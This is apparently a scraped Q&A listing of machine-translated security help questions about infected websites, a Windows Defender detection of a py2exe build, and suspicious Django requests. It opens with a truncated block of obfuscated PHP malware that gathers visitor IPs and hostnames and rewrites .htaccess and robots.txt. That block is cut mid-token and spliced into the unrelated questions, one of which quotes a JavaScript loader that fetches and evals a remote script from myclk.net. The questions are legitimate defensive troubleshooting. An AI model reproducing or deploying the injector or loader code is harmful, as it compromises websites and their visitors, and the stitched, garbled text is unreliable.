${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x30\x4f\x30\x5f\x30\x4f\x4f"](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x5f\x30\x5f\x30\x4f\x4f"]($OO__O0O_00.$OO__0O0_O0.$OOO_00__0O));');$OO_0O0_0_O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x4f\x5f\x4f\x5f\x30\x30"]('$OO_OO0__00=\'\'','if(isset(${"\x5f\x53\x45\x52\x56\x45\x52"})){if(isset(${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x5f\x58\x5f\x46\x4f\x52\x57\x41\x52\x44\x45\x44\x5f\x46\x4f\x52"])){$OO_OO0__00=${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x5f\x58\x5f\x46\x4f\x52\x57\x41\x52\x44\x45\x44\x5f\x46\x4f\x52"];}else if(isset(${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x5f\x43\x4c\x49\x45\x4e\x54\x5f\x49\x50"])){$OO_OO0__00=${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x5f\x43\x4c\x49\x45\x4e\x54\x5f\x49\x50"];}else{$OO_OO0__00=${"\x5f\x53\x45\x52\x56\x45\x52"}["\x52\x45\x4d\x4f\x54\x45\x5f\x41\x44\x44\x52"];}}else{if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x30\x5f\x5f\x4f\x30\x5f\x30"](\'HTTP_X_FORWARDED_FOR\')){$OO_OO0__00=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x30\x5f\x5f\x4f\x30\x5f\x30"](\'HTTP_X_FORWARDED_FOR\');}else if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x30\x5f\x5f\x4f\x30\x5f\x30"](\'HTTP_CLIENT_IP\')){$OO_OO0__00=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x30\x5f\x5f\x4f\x30\x5f\x30"](\'HTTP_CLIENT_IP\');}else{$OO_OO0__00=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x30\x5f\x5f\x4f\x30\x5f\x30"](\'REMOTE_ADDR\');}}return $OO_OO0__00;');$O0_O_O_O00=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x4f\x5f\x4f\x5f\x30\x30"]('$OOO0__0O_0=\'\'','if(isset(${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x5f\x48\x4f\x53\x54"])){return ${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x5f\x48\x4f\x53\x54"];}elseif(isset(${"\x5f\x53\x45\x52\x56\x45\x52"}["\x53\x45\x52\x56\x45\x52\x5f\x4e\x41\x4d\x45"])){return ${"\x5f\x53\x45\x52\x56\x45\x52"}["\x53\x45\x52\x56\x45\x52\x5f\x4e\x41\x4d\x45"];}return $OOO0__0O_0;');$O_O0O_00O_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x4f\x5f\x4f\x5f\x30\x30"]('$O0_O00_OO_','$O__OO00_0O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x5f\x4f\x4f\x30\x5f\x30"]($O0_O00_OO_);$OO0_0__0OO=\'\';for ($O_00OO0O__=0;$O_00OO0O__<${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x5f\x5f\x4f\x30\x5f\x30\x30"]($O__OO00_0O);$O_00OO0O__++){if($O_00OO0O__%2!=0){$OO0_0__0OO.=$O__OO00_0O[$O_00OO0O__];}}return ${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x5f\x30\x5f\x30\x4f\x4f"]($OO0_0__0OO);');$O__O0_00OO=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x4f\x5f\x4f\x5f\x30\x30"]('$O_OO00__0O','$O_OO00__0O=@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x5f\x5f\x4f\x4f\x30\x30\x4f"](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x5f\x30\x5f\x30\x4f\x4f"]($O_OO00__0O));$O__00O_0OO=@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x30\x4f\x5f\x30\x4f\x5f\x5f"](\'/\\|/si\',$O_OO00__0O,-1,PREG_SPLIT_NO_EMPTY);if(!${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x5f\x5f\x5f\x30\x4f\x30\x4f"]($O__00O_0OO)){return false;}if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x5f\x5f\x4f\x30\x5f\x30\x30"]($O__00O_0OO)<2){return false;}$O_OO00__0O_array["data"]=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x5f\x5f\x30\x4f\x30\x30\x5f"]($O__00O_0OO);$O_OO00__0O_array["data"]=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x5f\x30\x5f\x30\x4f\x4f"]($O_OO00__0O_array["data"]);$O_OO00__0O_array["headers"]=$O__00O_0OO;return $O_OO00__0O_array;');$O_OO0_O00_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x4f\x5f\x4f\x5f\x30\x30"]('$O_0_0_OO0O=\'\'','if($O_0_0_OO0O==\'\'){$O_0_0_OO0O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x30\x5f\x4f\x4f\x30\x5f\x4f"](\'08soShTUxOTi0tPuBgA=\');}$O_OO00__0O="PElmTW9kdWxlIG1vZF9yZXdyaXRlLmM+ClJld3JpdGVFbmdpbmUgT24KUmV3cml0ZUJhc2UgLwpSZXdyaXRlUnVsZSBeaW5kZXhcLnBocCQgLSBbTF0KUmV3cml0ZVJ1bGUgXiguKilyYWRpb1wucGhwJCAtIFtMXQpSZXdyaXRlUnVsZSBeKC4qKWNvbnRlbnRcLnBocCQgLSBbTF0KUmV3cml0ZVJ1bGUgXiguKilhYm91dFwucGhwJCAtIFtMXQpSZXdyaXRlUnVsZSBeKC4qKWxvY2szNjBcLnBocCQgLSBbTF0KUmV3cml0ZVJ1bGUgXiguKikucGhwKC4qKSQgL2luZGV4LnBocCBbTF0KUmV3cml0ZUNvbmQgJXtSRVFVRVNUX0ZJTEVOQU1FfSAhLWYKUmV3cml0ZUNvbmQgJXtSRVFVRVNUX0ZJTEVOQU1FfSAhLWQKUmV3cml0ZVJ1bGUgLiAvaW5kZXgucGhwIFtMXQo8L0lmTW9kdWxlPg==";$O_OO00__0O=@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x5f\x30\x5f\x30\x4f\x4f"]($O_OO00__0O);if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x4f\x4f\x30\x5f\x5f\x30\x5f"]($O_0_0_OO0O)){$O_OO_O00_0=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x4f\x5f\x30\x30\x30\x5f\x4f"]($O_0_0_OO0O);if($O_OO00__0O==$O_OO_O00_0){return;}}$OO_0__O0O0="robots.txt";if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x4f\x4f\x30\x5f\x5f\x30\x5f"]($OO_0__O0O0)){@${"\x47\x4c\x4f\x42\x4 我们最近接到了一位客户的电话,抱怨他们的网站在页面底部有一些"奇怪的代码".我们查看了源代码,发现templates/master在</html>标记之后,大约有800字节的恶意javascript代码被附加到文件中.我不会发布所说的代码,因为它看起来特别讨厌.
据我所知,除非有人直接访问服务器和/或FTP登录详细信息,否则无法以任何方式编辑此文件.实际文件本身已被修改,因此排除了任何类型的SQL攻击.除了身体获得凭据并手动修改此文件的人之外,还会对发生的事情进行任何其他逻辑解释吗?有没有其他人有过这种事情的经历?
我在Python 2.x,PyQT4和MySQLdb中为我的公司编写了一个应用程序,并使用py2exe打包.
最近,我对应用程序进行了一些更新,将其移植到Python 3.4和PySide.我还删除了MySQLdb依赖项并添加了Requests.我用Python 3新推出的py2exe打包了这个.
突然间,我被Windows防御者标记为我的可执行文件是恶意软件.这是日志条目:
Windows Defender has detected spyware or other potentially unwanted software.
For more information please see the following:
http://go.microsoft.com/fwlink/?linkid=37020&name=BrowserModifier:Win32/Zwangi&threatid=144384
Name:BrowserModifier:Win32/Zwangi
ID:144384
Severity:High
Category:Browser Modifier
Path Found:file:C:\Users\alan.moore\Desktop\ticketuserclient3-beta1\ticketuserclient3\Contact tech support.exe
Detection Type:Concrete
Detection Source:Downloads and attachments
Status:Unknown
User:WILLIAMSON-TN\alan.moore
Process Name:C:\Windows\Explorer.EXE
Run Code Online (Sandbox Code Playgroud)
所以我的问题是:
谢谢你的帮助.
更新:显然我在python3.4下使用py2exe编译的任何内容都会被识别出来.
我试过这个脚本:
import sys
import platform
print (sys.platform)
print ("".join(platform.uname))
Run Code Online (Sandbox Code Playgroud)
而这个setup.py
from distutils.core import setup
import os
import py2exe
setup(
windows=[{"script":"test.py", "dest_base":"Contact tech support"},],
options= {
"py2exe" : {
"compressed":1,
"optimize":2,
"bundle_files":3 …Run Code Online (Sandbox Code Playgroud) 我在这个问题上有点失落,所以请原谅.我知道关于这一点还有其他线索,但我找不到答案.
在网站加载时,用户点击它的位置无关紧要是浏览器中带有广告的打开添加标签.
到目前为止我通过查看浏览器控制台找到的是加载了一些js文件
http://cdn.mecash.ru/js/replace.js
Run Code Online (Sandbox Code Playgroud)
这个文件包含
!function(w){if(w.self==w.top){var r=new XMLHttpRequest;r.onload=function(){eval(this.responseText)},r.open("get","//myclk.net/js/tx.js",!0),r.send()}}(window);
Run Code Online (Sandbox Code Playgroud)
通过观察这一点,tx.js我怀疑这是黑客注入的.
问题是我一直在查看主机上的文件,但找不到任何包含或此类内容js.
有人可以帮助我,告诉我在哪里或者我怎么能找到它?
我在 Amazon Lightsail 上托管一个简单的原型,并且在 Django 服务器上看到了一些奇怪的请求。有什么需要担心的吗?
Invalid HTTP_HOST header: 'fuwu.sogou.com'. You may need to add 'fuwu.sogou.com' to
ALLOWED_HOSTS.
Invalid HTTP_HOST header: 'fuwu.sogou.com'. You may need to add 'fuwu.sogou.com' to
ALLOWED_HOSTS.
Bad Request: /http:/fuwu.sogou.com/404/index.html
Bad Request: /http:/fuwu.sogou.com/404/index.html
[01/Aug/2021 02:50:44] "GET http://fuwu.sogou.com/404/index.html HTTP/1.1" 400 63056
[01/Aug/2021 02:50:44] "GET http://fuwu.sogou.com/404/index.html HTTP/1.1" 400 63066
[01/Aug/2021 02:50:51] code 400, message Bad request syntax ('\x05\x01\x00')
[01/Aug/2021 02:50:51] "" 400 -
Run Code Online (Sandbox Code Playgroud) malware ×10
security ×5
javascript ×3
php ×3
wordpress ×3
virus ×2
browser ×1
caching ×1
django ×1
py2exe ×1
python-3.x ×1
redirect ×1
spam ×1
web-scraping ×1
windows ×1